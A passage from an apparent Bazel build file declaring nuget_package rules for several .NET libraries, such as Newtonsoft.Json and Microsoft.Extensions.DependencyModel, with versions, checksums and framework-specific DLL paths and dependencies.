"netcoreapp2.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netcoreapp3.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netcoreapp3.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
},
net_lib = {
"net45": "lib/net45/Newtonsoft.Json.dll",
"net451": "lib/net45/Newtonsoft.Json.dll",
"net452": "lib/net45/Newtonsoft.Json.dll",
"net46": "lib/net45/Newtonsoft.Json.dll",
"net461": "lib/net45/Newtonsoft.Json.dll",
"net462": "lib/net45/Newtonsoft.Json.dll",
"net47": "lib/net45/Newtonsoft.Json.dll",
"net471": "lib/net45/Newtonsoft.Json.dll",
"net472": "lib/net45/Newtonsoft.Json.dll",
"net48": "lib/net45/Newtonsoft.Json.dll",
"netstandard1.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.2": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.3": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.4": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.5": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.6": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard2.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard2.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
},
mono_lib = "lib/net45/Newtonsoft.Json.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netcoreapp2.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netcoreapp3.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netcoreapp3.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
},
net_files = {
"net45": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net451": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net452": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net46": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net461": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net462": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net47": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net471": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net472": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net48": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.2": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.3": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.4": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.5": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.6": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard2.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard2.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
},
mono_files = [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
)
nuget_package(
name = "system.runtime.interopservices.runtimeinformation",
package = "system.runtime.interopservices.runtimeinformation",
version = "4.0.0",
sha256 = "e63e776a66fbe80dd23e21370749654f65cfc74e7cf82804ece5cbe1b2da953e",
core_ref = {
"netcoreapp2.0": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netcoreapp2.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netcoreapp3.0": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netcoreapp3.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
},
net_lib = {
"net45": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net451": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net452": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net46": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net461": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net462": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net47": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net471": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net472": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
"net48": "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
},
net_ref = {
"net45": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net451": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net452": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net46": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net461": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net462": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net47": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net471": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net472": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"net48": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.2": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.3": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.4": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.5": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard1.6": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard2.0": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
"netstandard2.1": "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
},
mono_lib = "lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
mono_ref = "ref/netstandard1.1/System.Runtime.InteropServices.RuntimeInformation.dll",
net_files = {
"net45": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net451": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net452": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net46": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net461": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net462": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net47": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net471": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net472": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
"net48": [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
},
mono_files = [
"lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll",
],
)
nuget_package(
name = "microsoft.extensions.dependencymodel",
package = "microsoft.extensions.dependencymodel",
version = "3.1.3",
sha256 = "e2ef26cd9c49f82084e9c8a64082478253fad280fa0c736af4cb94bf5315d428",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
},
net_lib = {
"net451": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net452": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net46": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net461": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net462": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net47": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net471": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net472": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"net48": "lib/net451/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.3": "lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.4": "lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.5": "lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"netstandard1.6": "lib/netstandard1.6/Microsoft.Extensions.DependencyModel.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
},
mono_lib = "lib/net451/Microsoft.Extensions.DependencyModel.dll",
net_deps = {
"net451": [
"@newtonsoft.json//:net451_net",
"@system.runtime.interopservices.runtimeinformation//:net451_net",
],
"net452": [
"@newtonsoft.json//:net452_net",
"@system.runtime.interopservices.runtimeinformation//:net452_net",
],
"net46": [
"@newtonsoft.json//:net46_net",
"@system.runtime.interopservices.runtimeinformation//:net46_net",
],
"net461": [
"@newtonsoft.json//:net461_net",
"@system.runtime.interopservices.runtimeinformation//:net461_net",
],
"net462": [
"@newtonsoft.json//:net462_net",
"@system.runtime.interopservices.runtimeinformation//:net462_net",
],
"net47": [
"@newtonsoft.json//:net47_net",
"@system.runtime.interopservices.runtimeinformation//:net47_net",
],
"net471": [
"@newtonsoft.json//:net471_net",
"@system.runtime.interopservices.runtimeinformation//:net471_net",
],
"net472": [
"@newtonsoft.json//:net472_net",
"@system.runtime.interopservices.runtimeinformation//:net472_net",
],
"net48": [
"@newtonsoft.json//:net48_net",
"@system.runtime.interopservices.runtimeinformation//:net48_net",
],
"netstandard1.3": [
"@newtonsoft.json//:netstandard1.3_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.3_net",
],
"netstandard1.4": [
"@newtonsoft.json//:netstandard1.4_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.4_net",
],
"netstandard1.5": [
"@newtonsoft.json//:netstandard1.5_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.5_net",
],
"netstandard1.6": [
"@newtonsoft.json//:netstandard1.6_net",
"@system.runtime.interopservices.runtimeinformation//:netstandard1.6_net",
],
},
mono_deps = [
"@newtonsoft.json//:mono",
"@system.runtime.interopservices.runtimeinformation//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
},
net_files = {
"net451": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net452": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net46": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net461": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net462": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net47": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net471": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net472": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"net48": [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.3": [
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.4": [
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.5": [
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.3/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard1.6": [
"lib/netstandard1.6/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard1.6/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.dll",
"lib/netstandard2.0/Microsoft.Extensions.DependencyModel.xml",
],
},
mono_files = [
"lib/net451/Microsoft.Extensions.DependencyModel.dll",
"lib/net451/Microsoft.Extensions.DependencyModel.xml",
],
)
nuget_package(
name = "microsoft.extensions.primitives",
package = "microsoft.extensions.primitives",
version = "3.1.3",
sha256 = "7b77cdb2f39328637eb66bf0982c07badc01c655c9f14e7185cc494b455d154b",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netcoreapp3.1": "lib/netcoreapp3.1/Microsoft.Extensions.Primitives.dll",
},
net_lib = {
"net461": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net462": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net47": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net471": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net472": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"net48": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
},
mono_lib = "lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
mono_deps = [
"@system.memory//:mono",
"@system.runtime.compilerservices.unsafe//:mono",
],
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netcoreapp3.1": [
"lib/netcoreapp3.1/Microsoft.Extensions.Primitives.dll",
"lib/netcoreapp3.1/Microsoft.Extensions.Primitives.xml",
],
},
net_files = {
"net461": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net462": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net47": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net471": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net472": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"net48": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
},
mono_files = [
"lib/netstandard2.0/Microsoft.Extensions.Primitives.dll",
"lib/netstandard2.0/Microsoft.Extensions.Primitives.xml",
],
)
nuget_package(
name = "system.componentmodel.composition",
package = "system.componentmodel.composition",
version = "4.7.0",
sha256 = "8f5ad0e2eb72a2530ddc140c48d7f7046634d202f93e9d41bbfaf225991bec11",
core_lib = {
"netcoreapp2.0": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"netcoreapp2.1": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.0": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.1": "lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
},
core_ref = {
"netcoreapp2.0": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netcoreapp2.1": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.0": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netcoreapp3.1": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
},
net_lib = {
"netstandard2.0": "lib/netstandard2.0/System.ComponentModel.Composition.dll",
"netstandard2.1": "lib/netstandard2.0/System.ComponentModel.Composition.dll",
},
net_ref = {
"netstandard2.0": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
"netstandard2.1": "ref/netstandard2.0/System.ComponentModel.Composition.dll",
},
core_files = {
"netcoreapp2.0": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
"netcoreapp2.1": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
"netcoreapp3.0": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
"netcoreapp3.1": [
"lib/netcoreapp2.0/System.ComponentModel.Composition.dll",
"lib/netcoreapp2.0/System.ComponentModel.Composition.xml",
],
},
net_files = {
"netstandard2.0": [
"lib/netstandard2.0/System.ComponentModel.Composition.dll",
"lib/netstandard2.0/System.ComponentModel.Composition.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/System.ComponentModel.Composition.dll",
"lib/netstandard2.0/System.ComponentModel.Composition.xml",
],
},
)
nuget_package(
name = "microsoft.web.xdt",
package = "microsoft.web.xdt",
version = "3.0.0",
sha256 = "161152cd56e0b6d602b6ba9470854537654a184cf52790c8f08cd107817371a1",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
},
net_lib = {
"net45": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net451": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net452": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net46": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net461": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net462": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net47": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net471": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net472": "lib/net40/Microsoft.Web.XmlTransform.dll",
"net48": "lib/net40/Microsoft.Web.XmlTransform.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
},
mono_lib = "lib/net40/Microsoft.Web.XmlTransform.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
},
net_files = {
"net45": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net451": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net452": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net46": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net461": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net462": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net47": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net471": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net472": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"net48": [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Web.XmlTransform.dll",
"lib/netstandard2.0/Microsoft.Web.XmlTransform.pdb",
],
},
mono_files = [
"lib/net40/Microsoft.Web.XmlTransform.dll",
"lib/net40/Microsoft.Web.XmlTransform.pdb",
],
)
nuget_package(
name = "microsoft.dotnet.internalabstractions",
package = "microsoft.dotnet.internalabstractions",
version = "1.0.0",
sha256 = "1d7de23971fbe48d4bede3628426cc3430e9728b5f6697d051da9d45318ce856",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netcoreapp2.1": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netcoreapp3.0": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netcoreapp3.1": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
},
net_lib = {
"net451": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net452": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net46": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net461": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net462": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net47": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net471": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net472": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"net48": "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.3": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.4": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.5": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard1.6": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard2.0": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
"netstandard2.1": "lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
},
mono_lib = "lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
core_deps = {
"netcoreapp2.0": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp2.0_core",
],
"netcoreapp2.1": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp2.1_core",
],
"netcoreapp3.0": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp3.0_core",
],
"netcoreapp3.1": [
"@system.runtime.interopservices.runtimeinformation//:netcoreapp3.1_core",
],
},
net_deps = {
"netstandard1.3": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.3_net",
],
"netstandard1.4": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.4_net",
],
"netstandard1.5": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.5_net",
],
"netstandard1.6": [
"@system.runtime.interopservices.runtimeinformation//:netstandard1.6_net",
],
"netstandard2.0": [
"@system.runtime.interopservices.runtimeinformation//:netstandard2.0_net",
],
"netstandard2.1": [
"@system.runtime.interopservices.runtimeinformation//:netstandard2.1_net",
],
},
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netcoreapp2.1": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netcoreapp3.0": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netcoreapp3.1": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
},
net_files = {
"net451": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net452": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net46": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net461": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net462": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net47": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net471": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net472": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"net48": [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.3": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.4": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.5": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard1.6": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard2.0": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
"netstandard2.1": [
"lib/netstandard1.3/Microsoft.DotNet.InternalAbstractions.dll",
],
},
mono_files = [
"lib/net451/Microsoft.DotNet.InternalAbstractions.dll",
],
)
nuget_package(
name = "microsoft.dotnet.platformabstractions",
package = "microsoft.dotnet.platformabstractions",
version = "3.1.3",
sha256 = "5f9cdf209694bfe719b7c6fbc130c47743f2fd98cc8c81901a2667311137414d",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
